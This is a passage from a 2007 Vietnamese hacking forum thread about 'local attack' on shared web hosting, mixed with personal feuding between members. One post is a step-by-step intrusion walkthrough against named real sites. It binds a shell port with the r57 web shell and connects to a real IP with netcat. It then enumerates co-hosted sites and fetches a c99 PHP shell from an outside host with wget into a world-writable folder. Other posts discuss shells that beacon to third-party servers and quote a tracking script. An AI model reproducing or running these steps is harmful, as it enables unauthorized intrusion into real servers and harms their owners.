Trước tiên GirL no0B xin lỗi bạn EnterX vì đã có những nhận định cá nhân của GirL no0B về quan niệm Local Attack từ phía bạn trong các bài viết ở trên . Mỗi người ai cũng có 1 nhận thức riêng và 1 tầm hiểu biết riêng nên GirL no0B biết là mình sai rồi , hi vọng bạn sẽ ko chấp nhất nữa smilie) .

Về phần dinhcaohack có lẽ trình độ của you đã đạt tới " đỉnh cao " nên ko thèm xem kỹ phần 1 và 2 của bài viết đã quá rõ ràng . Việc upload 1 file vào 1 folder chmod 777 ko lẽ là vấn đề nan giải ? Thêm nữa nội dung của bài viết chỉ xoay quanh các hướng đi cơ bản của local attack nhằm chia sẽ với mọi người những kinh nghiệm thực tế chứ bản thân VN Magic bị lỗi từ trong source nên có chuyển đi đâu thì vẫn có thể bị phá như thường thôi , điều này bản thân dinhcaohack phải thừa hiểu hơn ai hết smilie , đừng nên chế ra thêm lỗi server này nọ để gây hoang mang lòng người như thế :lolsmilie , sau những sự việc xảy ra mấy ngày qua , GirL no0B thừa hiểu rằng làm gì có chuyện nhân nhượng từ đối phương dành cho VN Magic , nếu đã dùng thủ đoạn thì ngại gì mà ko dám nhận chứ ( ở đời trình độ ko đủ thì dùng thủ đoạn là lẽ bình thường mà ) ? nếu you cảm thấy GirL no0B nói ko đúng thì xin mời 1 lần nữa " in dấu " lên VN Magic cho GirL no0B tâm phục khẩu phục ( đây ko phải là lời thách thức mà chỉ đơn giản là muốn mở rộng tầm nhìn thôi , đừng hiểu lầm nhé ) .

Tiếp tục , trên trang chủ của VN Magic đã giới thiệu rõ ràng GirL no0B cũng chính là Quỳnh Anh >>> admin mới của VN Magic , chỉ có ai ko có mắt mới ko thấy điều này cho nên chẳng có chuyện " mượn dao kẻ khác " này nọ như ý kiến của you . Nếu you làm điều gì khiến cho chính you cảm thấy nhột nhạt thì cũng ko cần phát biểu linh tinh làm gì để lộ ra cái " dại " của mình cho người ta thấy như thế .

Việc sử dụng sources và scripts shared là sở thích của cá nhân thôi , GirL no0B ko muốn nói sâu hơn về chuyện này , nhưng đối với GirL no0B thì nhờ như thế mà GirL no0B học thêm được rất nhiều , và ít nhất cũng đã hiểu được trình độ của 1 số nhân vật from HCE , HCV và VNISS . Và cũng qua những điều như vậy mà GirL no0B càng thêm cảm phục các anh quản trị của HVA ( cái này thì GirL no0B sẽ nói sau ở 1 nơi thích hợp hơn ) nên quyết định vào đây để được học hỏi .

Domain matrix2k.org hiện tại thuộc sở hữu của VN Magic cho nên việc sử dụng nó làm gì là quyền quản trị VN Magic , GirL no0B nghĩ ko đến nổi nghiêm trọng là sự " thách thức " như you nói chứ ? Còn lại các nhóm HCE hay HCV gì đó xin để mỗi người có ý kiến riêng của mỗi người , đơn cử việc bind shell vào soucres để phá hoại các site khác rồi lạm dụng chữ Hacking - Hacker che đậy cho cái hành động bỉ ổi >>> GirL no0B cảm thấy nực cười .

Cuối cùng , GirL no0B xin nhắc lại rằng như đã nói rõ ràng ở phần đầu , bài viết này chỉ mang tính chất chia sẽ , đúc kết từ những kinh nghiệm cá nhân của GirL no0B đồng thời để được sự giúp đỡ từ các anh chị và các bạn đi trước hướng dẫn và chỉ điểm cho những điều sai sót , GirL no0B đã thừa nhận rõ ràng mình chỉ là newbie và luôn tha thiết được mọi người hướng dẫn thêm để bổ sung có cái kiến thức hạn hẹp của GirL no0B , hoàn toàn chẳng có ý khoe khoang như lời dinhcaohack bình luận , vâng trình độ của GirL no0B thì quả thật còn " non lắm " , nhưng cũng tự mừng là ko đến nỗi phải " kèm trẻ em " vào sources mới xóa được toàn bộ files và database của HCV smilie . Tóm lại đã tự hiểu những lời của mình là nhố nhăng thì ko cần thiết phải nói ra cho mọi người cùng thấy như thế đâu smilie .

Bắt đầu từ sau bài reply này GirL no0B xin mạn phép sẽ ko nói về những việc đi xa với chủ đề chính của Topic nữa . Cảm nhận về các ý kiến cá nhân xin để mọi người tự phán xét . Một lần nữa xin cảm ơn tất cả và hi vọng cùng được giao lưu học hỏi từ mọi người .

Quỳnh Anh ( aka GirL no0B )
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 23/06/2007 00:22:06 (+0700) | #19 | 66290
[Avatar]
tphong
Member

[Minus]    0    [Plus]
Joined: 07/03/2005 22:16:25
Messages: 10
Location: Núi
Offline
[Profile] [PM]
Thú vị thật. Minh cũng từng thử qua local attack. Nhưng cũng chỉ đến đó, nghĩ lại cũng thấy xấu hổ. Không tiến thêm được.
Ở đời, ăn thua ai "sâu" hơn thôi. smilie
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 23/06/2007 00:24:41 (+0700) | #20 | 66291
[Avatar]
hieuhoc
Member

[Minus]    0    [Plus]
Joined: 08/09/2006 21:57:39
Messages: 103
Offline
[Profile] [PM]

conmale wrote:
Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn.

E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó . Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường.

Tip: soi các block base64 để biết chi tiết.

 

Có 1 số "script kiddies" khác lại thay cái base64 đó ghi log vào host của mình nữa ==> "script kiddies" cũng lém lắm đó anh smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 23/06/2007 09:25:15 (+0700) | #21 | 66384
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript> 


smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 23/06/2007 09:30:57 (+0700) | #22 | 66387
[Avatar]
gsmth
Elite Member

[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

GirL Noob wrote:
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript> 


smilie  

Định làm cái gì vậy ??
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 23/06/2007 12:17:32 (+0700) | #23 | 66416
[Avatar]
dinhcaohack
Member

[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
@gsmth : đọc bài của lão conmale page #1
@ Girl : k0 cãi nhau với em nữa smilie, tùy em thích nghĩ thế nào thì nghĩ ^^ smilie ... anh khuyên em nhiều rồi mà em vẫn thế smilie bb em
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 23/06/2007 12:24:52 (+0700) | #24 | 66418
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
Phần 4 :

drwxrwxrwx | rwxrwxrwx | 777

Các ký tự trên chắc ko còn ai xa lạ gì , Quỳnh Anh muốn nhắc lại 1 chút để dễ làm việc hơn với môi trường shell . Với Local Attack , các folder chmod 777 chính là một trong những yếu tố thuận lợi cho attackers . Ngẫm lại cũng buồn cười cho " đại ca " dinhcaohack của Vờ Nịt cứ đánh đố Quỳnh Anh là làm sao mà " đại ca " upload được shell trên viethacker.name smilie , ko lẽ bây giờ Quỳnh Anh ngồi liệt kê ra trăm ngàn cách để làm việc đó thì " đại ca " mới hiểu được là folder đó được chmod 777 hay sao haha , khổ thân cho " đại ca " tất cả các folder của vnmagic.net đều được chmod 701 nên " đại ca " phải remote qua viethacker.name mới có 1 folder chmod 777 :lolsmilie .

Có lẽ ai cũng biết chuyện sử dụng r57 hay c99 để upload files vào 1 folder chmod 777 trên host victim đơn giản như thế nào rồi . Ở phần này Quỳnh Anh muốn nhắc đến 1 chức năng khác của r57 : Bind port to /bin/bash , và chúng ta sẽ làm việc trên Netcat .

Hôm nay lang thang trên Google lụm được trang này về làm bài minh họa :

http://www.bullzer.com/

( Xin cảm ơn ) 


Khi attackers đã upload r57 vào host của bullzer.com :




các bạn hãy nhìn vào mũi tên trên hình , trước tiên ta sẽ tìm xem IP của server này là gì :




Attackers có thể bind port bất kỳ qua r57 trên host victim :




và dễ dàng dùng Netcat connect vào cổng vừa mở ( như chúng ta đã biết IP của server trên là 209.67.219.235 và port Quỳnh Anh vừa bind là 1221) :

nc -vv 209.67.219.235 1221 





Với các lệnh id : kiểm tra group hiện tại , pwd kiểm tra directory hiện tại .

Tới đây có lẽ các bạn mới bắt đầu tìm hiểu hacking sẽ thắc mắc như vậy chúng ta sẽ làm gì tiếp tục ? tại sao chúng ta ko khai thác trực tiếp trên php shell ? Rất đơn giản , để khai thác 1 server , attackers cần phải có 1 môi trường thuận lợi , theo dõi tiếp tục bài viết các bạn sẽ thấy rõ vấn đề hơn .

Nhưng trước tiên đi sang các phần khác , Quỳnh Anh nhắc lại 1 chút về Local Attack từ site này sang site khác cùng 1 sever ( ở đây chúng ta sử dụng Netcat ) .

Hãy kiểm tra các sites trên cùng server này :

ls -la /etc/valiases 


Kết quả sẽ như sau :




Chúng ta đã liệt kê được tất cả users và sites trên server này , Quỳnh Anh chọn site showpart.net làm mục tiêu .

Xem lại các bước trên , các bạn sẽ dễ dàng nhận thấy các directory của các sites trên server này có dạng :

/home/user/public_html/ 
và site showpart.net có user là showpart , trở lại Netcat chúng ta dùng lệnh :

cd /home/showpart/public_html/
ls -lia 





Dễ dàng nhận thấy thư mục cache và templates_c của site này chmod 777 , dễ dàng cho chúng ta upload php shell vào với các câu lệnh đơn giản sau :


- cd templates_c ( chuyển sang work directory /home/showpart/public_html/templates_c )
- wget [color="#2E8B57"]http://viethacker.name/testsh/9s1.txt[/color] ( link file shell c99 dạng txt )
- mv 9s1.txt girlnoob.php ( đổi file 9s1.txt thành girlnoob.php để sử dụng )
 





Và kết quả cuối cùng hãy kiểm tra xem nào :




Và bây giờ Quỳnh Anh chỉ việc mở url browser lên và connect vào http://showpart.net/templates_c/girlnoob.php nếu muốn tiếp tục công việc còn lại ...

Phần 4 Quỳnh Anh tạm ngưng ở đây . Hi vọng các bạn sẽ có 1 cái nhìn thực tế hơn trong việc CHMOD 777 .

Để bảo đảm an toàn cho các sites minh họa bài này Quỳnh Anh đã remove tất cả php shell , các bạn có thể ghé thăm người ta nhưng đừng cố tìm links shell làm gì nhé :wink: .
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 23/06/2007 13:10:46 (+0700) | #25 | 66424
prof
Moderator

Joined: 23/11/2004 01:08:55
Messages: 205
Offline
[Profile] [PM]
Hello GirL Noob,

Trước tiên, rất cảm ơn bạn đã có loạt bài viết tỉ mỉ cho HVA. Tuy nhiên, nếu lược bỏ đi một số câu từ đả kích một vài cá nhân, hay nhóm người nào đó ít nhiều có liên quan đến bạn, thì bài viết của bạn sẽ hay hơn. Khi đó, các thảo luận sẽ tập trung vào chuyên môn, thay cho việc xuất hiện lời qua tiếng lại trên diễn đàn mà tôi nghĩ bản thân bạn cũng không muốn thế, đúng ko nhỉ? smilie)

Mong bạn GirL Noob rút kinh nghiệm cho các bài viết sau.

Thân.
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 23/06/2007 13:25:42 (+0700) | #26 | 66429
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]

prof wrote:
Hello GirL Noob,

Trước tiên, rất cảm ơn bạn đã có loạt bài viết tỉ mỉ cho HVA. Tuy nhiên, nếu lược bỏ đi một số câu từ đả kích một vài cá nhân, hay nhóm người nào đó ít nhiều có liên quan đến bạn, thì bài viết của bạn sẽ hay hơn. Khi đó, các thảo luận sẽ tập trung vào chuyên môn, thay cho việc xuất hiện lời qua tiếng lại trên diễn đàn mà tôi nghĩ bản thân bạn cũng không muốn thế, đúng ko nhỉ? smilie)

Mong bạn GirL Noob rút kinh nghiệm cho các bài viết sau.

Thân. 


Em xin lỗi , thật ra thì cũng vì người ta muốn nghe em nói thôi smilie( . Em cũng hứa là ko nói thêm gì nữa rồi . Các bài viết sau em sẽ rút kinh nghiệm . Cảm ơn anh và mọi người quan tâm .
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 23/06/2007 17:27:17 (+0700) | #27 | 66454
[Avatar]
SonNguyen_sn
Member

[Minus]    0    [Plus]
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
[Profile] [PM]

GirL Noob wrote:
[color="#FF0000"]Phần 2 :[/color]

Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :




 

Quỳnh Anh có phải là Meo con Hacker không nhei.
Cô bé đừng như thế nữa nhé.
Tại sao Des tại đánh vnmagic. Và tại sao HCV lại ra đi?
Rồi còn chú server upload của CHF nữa.

smilie
và cái vnhacker.biz j j của E. Bọn E tự up 2 chú shell R57 và R59 lên đấy.
Để rồi gậy ông đập lưng ông.

----
Bài viết của kưng rất có giá trị cho Newbie. Nhưng mọi người đừng theo đấy nhé. Phài biết cách tấn công thì mới phòng chống đc
Nhưng đừng chọc j của ai nhé
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 23/06/2007 23:01:48 (+0700) | #28 | 66476
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
@ SonNguyen_sn : nhầm người rồi bạn , vnhacker là cái gì ? Nói gì GirL no0B ko hiểu gì hết .
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 24/06/2007 02:17:00 (+0700) | #29 | 66520
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

GirL Noob wrote:
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript> 


smilie  


Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau:

1) nếu không biết nó dùng để làm gì --> đừng tải về.

2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về.

3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về.



Muốn thâm nhập, tàn phá, bảo vệ, phòng thủ.... đều phải biết rõ mình đang dùng cái gì và đang làm gì với nó. Đây là lý do tại sao tôi phát biểu lần đầu:

Hừm.... lại r57, c99.

Không biết chừng nào mới lớn khôn.



Những ai có đủ kiên nhẫn, đủ kiến thức để soi mấy con r57, c99 và những con tương tự để "bào chế" theo ý mình thì không xếp vào dạng "script kiddie". Tuy nhiên, nếu vì thế mà cho mình là 'hacker' thì chưa đủ bởi vì vẫn dùng cái người khác đã tạo ra cho mục đích riêng của mình. Ngoài ra những hành vi đưa cái dòng "developed by...." và là những hành vi không thể chấp nhận được.
What bringing us together is stronger than what pulling us apart.
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 24/06/2007 03:15:11 (+0700) | #30 | 66527
[Avatar]
anhdaikho_vt
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 18:02:31
Messages: 22
Offline
[Profile] [PM]
Code:
uid=99(nobody) gid=99(nobody) groups=99(nobody)

Chời ạ, với id như thế mà làm mưa làm gió cả cái server được hả chài ? Khâm phục, khâm phục. :?)
[Locked] [Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|